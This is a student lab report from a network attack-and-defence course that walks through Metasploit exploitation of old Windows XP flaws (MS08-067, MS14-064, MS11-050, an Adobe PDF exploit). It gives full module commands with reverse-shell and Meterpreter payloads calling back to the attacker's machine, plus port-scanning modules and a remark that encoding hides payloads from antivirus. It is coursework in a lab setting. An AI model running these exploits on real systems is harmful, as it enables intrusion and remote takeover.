2019-2020-2 20175233 《网络对抗技术》Exp6 MSF基础应用
2019-2020-2 20175233 《网络对抗技术》Exp6 MSF基础应用
-
实践内容(3.5分)
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
-
一个主动攻击实践,如ms08_067; (1分)
-
一个针对浏览器的攻击,如ms11_050;(1分)
-
一个针对客户端的攻击,如Adobe;(1分)
-
成功应用任何一个辅助模块。(0.5分)
-
-
报告内容:
- 基础问题回答
-
用自己的话解释什么是exploit,payload,encode
- exploit是工具,用来连接漏洞,将payload传送到靶机中
- payload是载荷,是目标系统在被exploit传送之后,去执行的攻击代码
- encode是编码,用来包装payload,不让杀软轻易发现payload就是攻击代码
- 实践总结与体会
- 实验主我要学习了metasploit工具多种方式的攻击,虽然攻击不复杂,但还是遇到好多错误,可能是msf对靶机的系统、版本等的要求不符,这我感受到要学的东西还有很多。
- 离实战还缺些什么技术或步骤?
- 靶机的ip
- 如何突破防火墙
- 实践过程记录
实践内容
一个主动攻击实践
ms08_067
-
Windows Xp的IP:
192.168.0.104kali的IP:192.168.0.124 -
相互能ping通
-
启动
msfconsole,输入search ms08_067查找
-
输入指令
use exploit/windows/smb/ms08_067_netapi进入攻击模块,使用show payloads,查看能够使用的payloads
-
使用指令
set payload generic/shell_reverse_tcp设置payload为反向tcp连接,使用show options查看可以设置的参数
-
设置参数
set RHOST 192.168.0.104 //设置靶机IP
set LPORT 5233 //设置攻击机端口
set LHOST 192.168.0.124//设置攻击机IP
exploit
- 输入
net user查看Win目前的用户名
针对浏览器的攻击
ms14_064
-
启动
msfconsole,然后输入search ms14_064查找
-
使用
use windows/browser/ms14_064_ole_code_execution设置模块,使用set payload windows/meterpreter/reverse_tcp设置payload,使用指令show options查看要设置的参数
-
设置参数
set LHOST 192.168.0.124
set LPORT 5233
set URIPATH 5233ysy //设置url域名
exploit
-
在Windows Xp浏览器输入
http://192.168.0.124:8080/5233ysy
-
用指令
sessions查看会话信息
ms11-050(失败)
输入
search ms11_050//查找漏洞
use exploit/windows/browser/ms11_050_mshtml_cobjectelement//选择漏洞
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.124//攻击机kali IP
set RHOST 192.168.0.104//靶机IP
exploit开始攻击
- 在windows XP的浏览器中访问
http://192.168.0.124:8080/uOCuTVxi
一个针对客户端的攻击
Adobe
- 输入
search adobe查找该漏洞使用的攻击模块,攻击模块为exploit/windows/fileformat/adobe_toolbutton
use exploit/windows/fileformat/adobe_toolbutton//设置模块
set payload windows/meterpreter/reverse_tcp 设置payload,
show options //查看要设置的参数
set RHOST 192.168.0.104//设置靶机IP
set LPORT 5233 //设置攻击机端口
set LHOST 192.168.0.124 //设置攻击机IP
exploit
在linux中另外打开一个终端,msfconsole进入控制台
use exploit/multi/handler使用监听模块
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.124
set LPORT 5233
exploit
- 靶机中打开pdf文件,攻击成功.
成功应用任何一个辅助模块
cert辅助模块
-
cert的扫描仪模块是一个有用的管理扫描仪,可以覆盖一个子网来检查服务器证书是否过期. -
输入
search cert首先查看辅助模块cert辅助模块的信息
-
设置参数
use auxiliary/scanner/telnet/telnet_version
set RHOSTS 192.168.0.124/24
set THREADS 50
run
TCP"XMas"端口扫描(唯一)
- 该模块的主要作用是判断端口是开放还是关闭,结果表示端口是开放或者被过滤(屏蔽)的.
search xmas首先查看xmas辅助模块的信息- 设置参数
use auxiliary/scanner/portscan/xmas
set RHOST 192.168.0.124
set ports 5233
run

浙公网安备 33010602011771号